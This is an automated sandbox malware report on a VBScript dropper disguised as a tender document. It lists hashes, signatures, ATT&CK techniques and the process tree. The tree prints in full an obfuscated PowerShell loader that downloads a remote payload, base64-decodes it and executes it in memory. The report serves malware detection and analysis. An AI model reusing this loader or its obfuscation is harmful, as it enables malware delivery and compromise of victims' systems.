68ea3f65bfe48f79eee9be6b332aa9bd993b70fdc56d06fc70e1c49607e2f312

Analysis

max time kernel
150s
max time network
151s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
11/06/2024, 19:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Tender - Borouge4 Pkg3 Project 2024.vbs
Size

132KB
MD5

16f2ab790ba2488360bd8a39d2735740
SHA1

e6644f718f3146bf8caae0081e54630243053f5b
SHA256

68ea3f65bfe48f79eee9be6b332aa9bd993b70fdc56d06fc70e1c49607e2f312
SHA512

81c50c2c124e00a8bfc8350fae96273ba2002d6457bb2535c12421cd630fe19e2c8ccbe2fbb4fa7d0da34d03aea30b8ebdf3fabff4b9ef49441859f79affb068
SSDEEP

3072:fwuzkYMPZJqaVBsPHFBktYkCeJ+URvMP/Rj5mk36VYK4qhU4IsMMBlOOc:f7kYMPZoaVBsPHFBqYkR+URkP/Rj5mja

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 64 IoCs

flow	pid	Process
6	2572	powershell.exe
7	2572	powershell.exe
8	2572	powershell.exe
9	2572	powershell.exe
10	2572	powershell.exe
11	2572	powershell.exe
12	2572	powershell.exe
13	2572	powershell.exe
14	2572	powershell.exe
15	2572	powershell.exe
16	2572	powershell.exe
17	2572	powershell.exe
18	2572	powershell.exe
19	2572	powershell.exe
20	2572	powershell.exe
21	2572	powershell.exe
22	2572	powershell.exe
23	2572	powershell.exe
24	2572	powershell.exe
25	2572	powershell.exe
26	2572	powershell.exe
27	2572	powershell.exe
28	2572	powershell.exe
29	2572	powershell.exe
30	2572	powershell.exe
31	2572	powershell.exe
32	2572	powershell.exe
33	2572	powershell.exe
34	2572	powershell.exe
35	2572	powershell.exe
36	2572	powershell.exe
37	2572	powershell.exe
38	2572	powershell.exe
39	2572	powershell.exe
40	2572	powershell.exe
41	2572	powershell.exe
42	2572	powershell.exe
43	2572	powershell.exe
44	2572	powershell.exe
45	2572	powershell.exe
46	2572	powershell.exe
47	2572	powershell.exe
48	2572	powershell.exe
49	2572	powershell.exe
50	2572	powershell.exe
51	2572	powershell.exe
52	2572	powershell.exe
53	2572	powershell.exe
54	2572	powershell.exe
55	2572	powershell.exe
56	2572	powershell.exe
57	2572	powershell.exe
58	2572	powershell.exe
59	2572	powershell.exe
60	2572	powershell.exe
61	2572	powershell.exe
62	2572	powershell.exe
63	2572	powershell.exe
64	2572	powershell.exe
65	2572	powershell.exe
66	2572	powershell.exe
67	2572	powershell.exe
68	2572	powershell.exe
69	2572	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
2892	ping.exe
1676	ping.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2572	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2572	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2328 wrote to memory of 1676	2328	WScript.exe	28
PID 2328 wrote to memory of 1676	2328	WScript.exe	28
PID 2328 wrote to memory of 1676	2328	WScript.exe	28
PID 2328 wrote to memory of 2892	2328	WScript.exe	30
PID 2328 wrote to memory of 2892	2328	WScript.exe	30
PID 2328 wrote to memory of 2892	2328	WScript.exe	30
PID 2328 wrote to memory of 2304	2328	WScript.exe	32
PID 2328 wrote to memory of 2304	2328	WScript.exe	32
PID 2328 wrote to memory of 2304	2328	WScript.exe	32
PID 2328 wrote to memory of 2572	2328	WScript.exe	34
PID 2328 wrote to memory of 2572	2328	WScript.exe	34
PID 2328 wrote to memory of 2572	2328	WScript.exe	34
PID 2572 wrote to memory of 2680	2572	powershell.exe	36
PID 2572 wrote to memory of 2680	2572	powershell.exe	36
PID 2572 wrote to memory of 2680	2572	powershell.exe	36

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Tender - Borouge4 Pkg3 Project 2024.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2328
- C:\Windows\System32\ping.exe
  ping google.com -n 1
  2⤵
  - Runs ping.exe
  PID:1676
- C:\Windows\System32\ping.exe
  ping %.%.%.%
  2⤵
  - Runs ping.exe
  PID:2892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c dir
  2⤵
  PID:2304
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$enterology = 1;$malaysias='';Function Kist($Nectarise57){$Graphed=$Nectarise57.Length-$enterology;$Omrystet=$malaysias+'Substring';For( $Horehounds=5;$Horehounds -lt $Graphed;$Horehounds+=6){$Orchestrally+=$Nectarise57.$Omrystet.Invoke( $Horehounds, $enterology);}$Orchestrally;}function Projektforlbene($Sciential){ & ($Indkaldebefjelsers) ($Sciential);}$Hypaethros=Kist 'Slu,nMJambooTransz Viroi SidelHeltelPensiaRhamp/Aggra5plat .Sekte0A.toc Ver,a(Loaf,W DemiiIldt nMa,dad ParkoMoti wBrasis Ba k MosquNDiphtTDenne Over1Me.io0Datas.S ldi0 ,epl;Unifi Bly,tWRituaiGeminnHybel6Caaba4 Gart;Ud,yg SalpexAltr 6nim,l4Labou; ursu Ragmar Buprv,rilu:Uplej1scari2 Best1ident.Skovb0Micro)Rynkn VegetGDivide .roccMachokBagtao Udsk/Baudr2Dekom0Dulli1Champ0lnn,z0Kapi.1 Swee0Pis i1Cosav LaanF Dom iExprerCracke .ammfIncuroD squxLs.rf/mayey1Jamre2Efte 1Selvr.Fitzr0Bucep ';$Bearnaisesovsen=Kist 'VaultUGr ndsTaxemeGadolrBehnd-C,azeAtllevgB,roeeEbbernMadontMans ';$Unanaemic=Kist 'RayfuhN.rkotFor ltFlatmpIncr.sTetan:.vers/Tilke/StvnisDebitpendanrStramifor rn LokatBibiae Coelr,nder. Royar SmudoBar t/ExcreBLearneFtpedb Udvir to aePerifeForesc SvarhN,sto.AlkalsReadjeu.idea Verb ';$Derivationer=Kist 'patri>Volvo ';$Indkaldebefjelsers=Kist 'duelliBryl,eAp,sox Netv ';$Uppsala='Trohjertigt';$Centralstyrelsens = Kist ' Synoe Udenc ebenhSni,voScene Anodi%Kampda Plurpcrotip ,andd Oxycafug stPe ogaDekam%Preaf\Ube.kMSpanke ,crix .sopiOst.acH.atha Forbnve,etealcorrrygekeHjspns Delp.HotelPKalkurUndero Pala Ju ef&I leg&Eksem DetekeOfficc hj.rhBataboEnant Overtme,th ';Projektforlbene (Kist 'Apish$TitalgDist.lProbaoIag.tb Sta.a vikalMount:B,rsrTPhotoalammetDis atBibrdeG mperChika=,laff(SyntacCla im A,sedLoung Frim/Pa,dlcPatib Herh$TimelC Gro eHege.n irbutTil rr ,araaArbejlBud,ys JambtsuffrySpirarAnnaseFift,lNo,arsexcave N,ntnFrancsBrdsk) Skva ');Projektforlbene (Kist 'Finpu$EjectgBloknltravboBhutab MonsaMarsklSnner:PreenT Opr rF,ticloldingUnsaln Fe pi ,ogsnudsyeg ctine.artir fkna=Feebl$Con.eU Lobsn SkaeaHon,ynPulwaapodagecamoumSvinei,ilmscSortl. idgsSnurppElianlstudeiPjusktL,gni(forha$ IndgDDefemeFlammr S,isiFo,skvmiliea oak.tcsfiriMaa koAnkomnm.lleeNemburG.rfa)Ark.t ');$Unanaemic=$Trlgninger[0];$Cassonade182= (Kist 'Dextr$IndtrgLogenl Indeoneu ybFoelgaMis,il Seni:Tr poGGaestiRelivsSub,yaHydror.lycemReso,eBynet=HexagN admie.ewyowPy.id-BssenOLakk bManchj ampeForvecPollitBedrv BibehS ampyModgasyieldtPrepoeAmphimS.etf.OrnamNAuraeeUdv,stFr gt.MastaWGletseBry,ub .usiCSpyd.lPaas,iFort,e StemnAmpu,t');$Cassonade182+=$Tatter[1];Projektforlbene ($Cassonade182);Projektforlbene (Kist 'Velly$B.indGBurd.i CardsHypera,ealyr H,mimMonare Valg.Ema.cH panne ,iggaSyntod UsereSarcirHarvesMansi[Inter$ EkviBSnerreRoo,saOve,pr SkrintevanaBlinki confs DhoueSrskasAncieoIm.orvTavsesSanemeTra lnsopor]Redoc=Undec$LexicHDe.alyPostbp Fle.aTils eIndd,tSyntohMisa rTri yo ,hecsDigit ');$Flerpartisystemets=Kist '.vero$ B ooG Noxaifo,iesPerigaUnrecr ,uldmVsnereWater. uoyaDp.opyoRadiowNoninnLexicl Re ioBirgiaSorehdSerpeFBeskii Kr,plTrvejeFilbe(Nonob$Rug mUMediknReen.a CestnEkspaa va,meKropsmInhaliBlo zcPap.t,Pleur$dulciC,loggoFadlslBrugeuSarn b DrejaMiniarPeaceiUn esaTalep)Dygti ';$Colubaria=$Tatter[0];Projektforlbene (Kist 'To ve$FaucigOtol,lKalkuoSla pbP,ecoaSkattlArbej:Skaalr Preve nagygCoolinLa.dbtGlimpiIndkvdKjae.eSerperAnta nNat,he.ldebsFletn= Forg(P.rheTDownmeBa,kssHeksetQueen-Rev.lPguaniaEklattBlackh Chec Opgav$Ve,siCeudaeo LbnilSaamau,lavobergotasgekorVinnailingvaOrtho)Virtu ');while (!$regntidernes) {Projektforlbene (Kist 'Kompr$D iftgSlanglVrktjoLovembKo traBerdul homo:HjemkK orphoEmpyrn,ontgtHiberaRecitmScumeiUforsnEkspoaUc nstRegn,ispidsoB.mben V.steJagtbrOverg= Subs$ rawltThorarDelikuRacemeMe lt ') ;Projektforlbene $Flerpartisystemets;Projektforlbene (Kist 'OvermSAcloutBegitaAnalor.pasmtInter-UnterS.ilbali.kasesquine uliap Ruts P.tr4Poker ');Projektforlbene (Kist 'Fordr$panchgOverblSim lo MinabUnde,aSprjtlUnati:SjaggrMargie.uthigAldi.nChlort eminiSuperdLychneM.dsprS,ingnK.ynoeFlighsTeglb=Hovme(BeljrTassyrePaakesBespat ,ffe-Cae,aPU.sugaAnnultUn,lah Crun Longi$LangmCBevidoReserl DevouWigglbOveriaUsselr runiCirkua dele)Inter ') ;Projektforlbene (Kist 'U.dsl$Fo,beg TherlRetleoSambeb ForraAnticl,ebop:SituaPCyclilSubsia DvessS.rintFarmdeSek ntSangf=Zoomi$Un,eug Pj.llElimioOutstbGrup a p rklHarri:N,polVD.nsee ysir,oeresKom oaHy.pil,ente+ F,ax+M jos% agri$kli nTTubiprTandfl,ntergUnternmaitri ufornHydr.gStegeeDeponrHomes.ForlicPolypoim,eduPimarnSlovetParti ') ;$Unanaemic=$Trlgninger[$Plastet];}$Approbativeness=301627;$Seksualismen=27315;Projektforlbene (Kist 'Share$Ationgfald.lA onso Un ibBegejaTarralud ek:KonstSRop,stNeavir epapeBarquphundet Em,no Geryk Mrdeo RigskHovedk Ruste OutprForkrnHaveaeSumlostembe Kande=Resig ,ommGKryste ncrt Conc- GrupCUnil,o,xocan OpeltResboe GilgnanpritMaste lysi$postcC HerroSen.ilHierauMolomb Es,jaAwearrcas ai Samva.wazi ');Projektforlbene (Kist ' Ath $NonswgindevlBlodmow,iskb ThroaImpail ,eld: TingP AfvirM hogaSrlige Lukscexp,noF,rhugfetisnRd.eli npartAarssuMunksmtelev hersk=Pho,o diate[KorruSVantayKikhus ps.ktwhan,eNabolmDolke.Ud.kaCunideoBrt.entillivFetice No ir ,rbetMunda]Diske: Un.m:s.udiFPotenr UnneoTrykrmBlizzBHesteaLandvsEfte eInfor6Aetio4CanerS EryxtLovter FjetiSmaasnKatingeradi(Ukla $B,gmuS .ydatOmbrirSvenseNonsupudenlt,unctoTranskungdooMor.ekHypopkgodkeeBuss,r ntern knifeTepotsSubch) Nona ');Projektforlbene (Kist 'Brdde$DruelgBege,lSemihoCo kobBrambaVurdelpatoi:GervaW A,gra Strur.useteBoninhMemo o GulduSaprosM,sseemellerDaisu Frste=Upwel Monot[.tmaaSFlammyMacrosO trotP,troeU.phrm,usli.Tit.lTBrance Refox VerdtHu an.BehndEKlninnB.uebcGooseoKoncedSpilliProten AmargB.vge]Ep th:subst:T,ngsAS,ramSGermuCSldniI HjemIAarhu. SemnGAntiseGattet bilbS SlantTu inrSvindiKidvinskrvegskold(Press$ Di,sP ProgrTornaaS mmaeFred.c UnisoUndergMoslenS,lteiKattet,nsneuLo.gemScree)Hidhr ');Projektforlbene (Kist 'Peach$VranggCalcelogreaoMotorbGrnseaSheaflHusle:VitroUPhylonE,sicmSpondorem,nnOsciloW,erepSletto Rid l .tyriStevosVi,lieD,does Haze=.umpe$ SkyrWK oglaUnecorHa.moeNaturhMe,icoFlappufl essMesmeeOv.rarTidss. Artissk beu SubsbPerfes Dri,tTykk,rSkaktiunbacnEksprgMart.(Pr,se$UlineACoadupAficipStje.rKosysoe emdbflaata StvdtPowldiWar avOverde NailnE,leveUniunsBetvusHaand, Dove$NapolSOdrerehandek A prsSubciuJordlaBegeml BraniFiligsSouscmUneupeMo,opnLevne)Dehum ');Projektforlbene $Unmonopolises;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2572
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Mexicaneres.Pro && echo t"
    3⤵
    PID:2680

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2572-4-0x0000000002C80000-0x0000000002D00000-memory.dmp

Filesize
512KB

Download
memory/2572-5-0x000000001B640000-0x000000001B922000-memory.dmp

Filesize
2.9MB

Download
memory/2572-6-0x0000000002220000-0x0000000002228000-memory.dmp

Filesize
32KB

Download
memory/2572-7-0x0000000002C80000-0x0000000002D00000-memory.dmp

Filesize
512KB

Download